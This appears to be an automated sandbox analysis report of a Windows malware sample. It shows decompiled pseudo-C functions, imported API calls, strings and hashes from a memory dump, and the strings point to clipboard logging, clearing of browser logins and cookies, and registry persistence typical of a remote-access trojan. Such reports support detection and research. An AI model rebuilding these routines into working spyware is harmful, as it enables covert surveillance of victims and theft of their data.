                                                                                • Opcode ID: cfd10d6ce02fbabf37b8e84b7ecf1405ef66a66763e050899b4a81a70fff1a60
                                                                                • Instruction ID: 2817f394542dad185436be8b0d9cd541a8c5b80d7f45bfec7e57154c42759719
                                                                                • Opcode Fuzzy Hash: cfd10d6ce02fbabf37b8e84b7ecf1405ef66a66763e050899b4a81a70fff1a60
                                                                                • Instruction Fuzzy Hash: FC316A31A00229AFCF25DF68D885ADF7FA9FF49350F14406AF909D7250CA74AA90DB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E004078BB(void* __ecx) {
                                                                                				signed int _v5;
                                                                                				signed int _v6;
                                                                                				signed int _v7;
                                                                                				signed int _v8;
                                                                                				void* _t40;
                                                                                				void* _t44;
                                                                                
                                                                                				_push(__ecx);
                                                                                				 *0x41b9b8 = 1;
                                                                                				Sleep( *0x41b9b4);
                                                                                				_v5 = _v5 & 0x00000000;
                                                                                				_v6 = _v6 & 0x00000000;
                                                                                				_v7 = _v7 & 0x00000000;
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				_t44 = 0;
                                                                                				do {
                                                                                					if(_v5 == 0) {
                                                                                						L2:
                                                                                						_v5 = E00407767();
                                                                                					}
                                                                                					if(_v6 == 0) {
                                                                                						_v6 = E0040751B();
                                                                                					}
                                                                                					if(_v8 == 0) {
                                                                                						_v8 = E0040728F();
                                                                                					}
                                                                                					if(_v7 == 0) {
                                                                                						_v7 = E004071CF();
                                                                                					}
                                                                                					if(_t44 == 0) {
                                                                                						_t44 = E0040710F();
                                                                                					}
                                                                                					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
                                                                                						Sleep(0x1388);
                                                                                					}
                                                                                					if(_v5 == 0) {
                                                                                						goto L2;
                                                                                					}
                                                                                				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0);
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                                                                				E00407A90("\n[Cleared browsers logins and cookies.]\n");
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                                                                				E0041203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8);
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
                                                                                				_t40 = E004020C2(0x41be70, 0xaf, 0x415664);
                                                                                				if( *0x41b9b0 != 0) {
                                                                                					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                					E0040B829(0x80000001, _t40, "FR", 1);
                                                                                				}
                                                                                				 *0x41b9b8 =  *0x41b9b8 & 0x00000000;
                                                                                				return 0;
                                                                                			}










                                                                                APIs
                                                                                • Sleep.KERNEL32 ref: 004078D4
                                                                                • Sleep.KERNEL32(00001388), ref: 0040794C
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 0040797C
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 00407992
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004079BF
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041601C,00000001,000000AF), ref: 004079E9
                                                                                  • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,0001781A,00000000), ref: 00407779
                                                                                  • Part of subcall function 00407767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                                                                  • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                                                                  • Part of subcall function 00407767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                                                                  • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                                                                  • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                                                                Strings
                                                                                • [INFO], xrefs: 004079A1
                                                                                • Cleared browsers logins and cookies., xrefs: 0040798D
                                                                                • [Cleared browsers logins and cookies.], xrefs: 00407977
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                                                                • API String ID: 3797260644-945983296
                                                                                • Opcode ID: 0e61d76a432f7d136fcb36c9125ac27c4ea5ca7fe30263cf05620935d75329bb
                                                                                • Instruction ID: 70147e8437466b13765d015bb4740f5a08e73b30c638215b5aa9753a2d15767b
                                                                                • Opcode Fuzzy Hash: 0e61d76a432f7d136fcb36c9125ac27c4ea5ca7fe30263cf05620935d75329bb
                                                                                • Instruction Fuzzy Hash: 733146B1D5D28879FB11F3E5890ABED7EA48B51354F1880ABD840222D2C7BD1A88D35B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 29%
                                                                                			E00407B8C(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                				char _v20;
                                                                                				char _v36;
                                                                                				void* _t19;
                                                                                				void* _t20;
                                                                                				void* _t21;
                                                                                				intOrPtr _t24;
                                                                                				char* _t29;
                                                                                				void* _t38;
                                                                                				intOrPtr _t49;
                                                                                				void* _t50;
                                                                                				void* _t53;
                                                                                
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t49 =  *__eax;
                                                                                				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                                                                				_t53 = _t50 + 0x24;
                                                                                				_t19 = _t49 - 0x42;
                                                                                				if(_t19 == 0) {
                                                                                					_t20 = E0040180C( &_v20, __eflags, 0);
                                                                                					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                					_t21 = E00406DD9(_t20);
                                                                                					__eflags = _t21;
                                                                                					_pop(_t38);
                                                                                					if(_t21 != 0) {
                                                                                						_t24 = E00407033(_t21, "FunFunc");
                                                                                						_push(_t38);
                                                                                						 *0x41ba18 = _t24;
                                                                                						 *0x41ba1c = 1;
                                                                                						E00412855(_t38, _t53, 0x41bcf8);
                                                                                						E004020C2(_a4, 0x6d, _t38);
                                                                                					}
                                                                                				} else {
                                                                                					_t56 = _t19 == 1;
                                                                                					if(_t19 == 1) {
                                                                                						_t29 = E0040180C( &_v20, _t56, 0);
                                                                                						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                						 *0x41ba18(atoi(_t29));
                                                                                					}
                                                                                				}
                                                                                				E004017DD( &_v20);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}















                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00407B96
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 00407BAE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00407BBE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407BCD
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407BF5
                                                                                • atoi.MSVCRT ref: 00407BFC
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407C19
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006D,?,?,00000000,FunFunc), ref: 00407C67
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000,FunFunc), ref: 00407C70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@V01@@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@D@1@@V01@atoi
                                                                                • String ID: FunFunc
                                                                                • API String ID: 2980839617-81400306
                                                                                • Opcode ID: 7ca6af520bbac52e49158eadb91d2fa1d859985617ee98aa7f2f949104987feb
                                                                                • Instruction ID: 99ba8aa056b8c4f8b9d909233289e7e9d1b022cfe78e0840cace3255d8d2923c
                                                                                • Opcode Fuzzy Hash: 7ca6af520bbac52e49158eadb91d2fa1d859985617ee98aa7f2f949104987feb
                                                                                • Instruction Fuzzy Hash: 1A21A271A042099BCB04FBB5EC1A9EE3768EF44344F00403AF512E71E0EF789540CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 31%
                                                                                			E00406C35(void* __ecx) {
                                                                                				char _v5;
                                                                                				char _v24;
                                                                                				char _v40;
                                                                                				char* _t13;
                                                                                				void* _t18;
                                                                                				void* _t34;
                                                                                
                                                                                				_t18 = __ecx;
                                                                                				if(( *0x41b8f8 & 0x00000001) == 0) {
                                                                                					 *0x41b8f8 =  *0x41b8f8 | 0x00000001;
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                                                                					E00413E72(E00406CF4);
                                                                                				}
                                                                                				E00406BEF(_t18,  &_v24);
                                                                                				_t13 =  &_v24;
                                                                                				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x41b8e8);
                                                                                				if(_t13 == 0) {
                                                                                					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
                                                                                					_t13 =  &_v24;
                                                                                					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x415664);
                                                                                					if(_t13 != 0) {
                                                                                						L00414176();
                                                                                						L00414170();
                                                                                						_t13 = E004054E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x41b8e8);
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
                                                                                					}
                                                                                				}
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return _t13;
                                                                                			}










                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C5B
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B8E8,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C81
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00405AF6), ref: 00406C93
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664,?,?,?,00405AF6), ref: 00406CA2
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],0041B8E8,[End of clipboard text]), ref: 00406CC4
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406CCE
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406CE0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00405AF6), ref: 00406CE9
                                                                                Strings
                                                                                • [Following text has been copied to clipboard:], xrefs: 00406CBE
                                                                                • [End of clipboard text], xrefs: 00406CB8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                                                                • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                                                                • API String ID: 1191203583-3441917614
                                                                                • Opcode ID: d45c7064f6117a9dd88d4012a8149be2358ef0f2c0164467ff371dd0e6a57b07
                                                                                • Instruction ID: f0c7cb0c0afa7c9892d6ee07c4285c518a0e55952a049bef315af4c10592b83c
                                                                                • Opcode Fuzzy Hash: d45c7064f6117a9dd88d4012a8149be2358ef0f2c0164467ff371dd0e6a57b07
                                                                                • Instruction Fuzzy Hash: F511BC71A00209A7CB04E7A5ED49EEF77BCDB95755B10403BF402B3191DB7889898769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                                                                  • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                                                                  • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                                                                  • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411A41
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 00411A48
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041C1C0,00415664), ref: 00411A61
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411A84
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411AA9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ABE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C1C0), ref: 00411ACB
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ADC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411AEC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@G@2@@std@@G@std@@$D@2@@std@@$??0?$basic_string@?c_str@?$basic_string@$??1?$basic_string@D@1@@$??8std@@D@2@@0@ExistsFilePathV01@@V?$basic_string@
                                                                                • String ID: alarm.wav
                                                                                • API String ID: 3304909635-4094641389
                                                                                • Opcode ID: 9946084532d36ed5acc281a55927049102a21ba0f6fe87ba3c3b11edf66e6487
                                                                                • Instruction ID: 963edfdf3fd52f0052b6b10baeb02962c7ef6d970aeca7efa99f7092008c0f7b
                                                                                • Opcode Fuzzy Hash: 9946084532d36ed5acc281a55927049102a21ba0f6fe87ba3c3b11edf66e6487
                                                                                • Instruction Fuzzy Hash: 4E11E931A41608E7CB04F7F5DD4AAEE3B38DF44342F504066F912930E1DBA85A84C6AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                                                                • time.MSVCRT ref: 004124E5
                                                                                • srand.MSVCRT ref: 004124F2
                                                                                • rand.MSVCRT ref: 00412506
                                                                                • rand.MSVCRT ref: 0041251A
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                                                                Strings
                                                                                • abcdefghijklmnopqrstuvwxyz, xrefs: 004124D5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                                                                • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                • API String ID: 3357298394-1277644989
                                                                                • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                                                                • Instruction ID: 712daf16f8b1022a6d974ed1f73c2a3049aadf137e9a4f533f5eb28a92ccc556
                                                                                • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                                                                • Instruction Fuzzy Hash: F211A57754021DEBCB04EBA1ED49AEE7BB9EB80361F104026FD01E71D0DA759945CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                                                                  • Part of subcall function 0040B9E8: RegOpenKeyExW.ADVAPI32(80000001,0040B9BA,00000000,00000002,0040B9BA,?,0040B9BA,80000001,00000000), ref: 0040B9F9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                                                                • String ID: origmsc
                                                                                • API String ID: 643209241-68016026
                                                                                • Opcode ID: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                                                                • Instruction ID: bc2c983ee8b044bee8b0063c187639ee25001bfa26dad0cec207db0dad549837
                                                                                • Opcode Fuzzy Hash: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                                                                • Instruction Fuzzy Hash: 9111B17280050DEFCF04EFE0ED598DE77B9EA482557104025F912D31A0EB71AA59CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,000197E8,?,?,0041225E,?), ref: 00412919
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
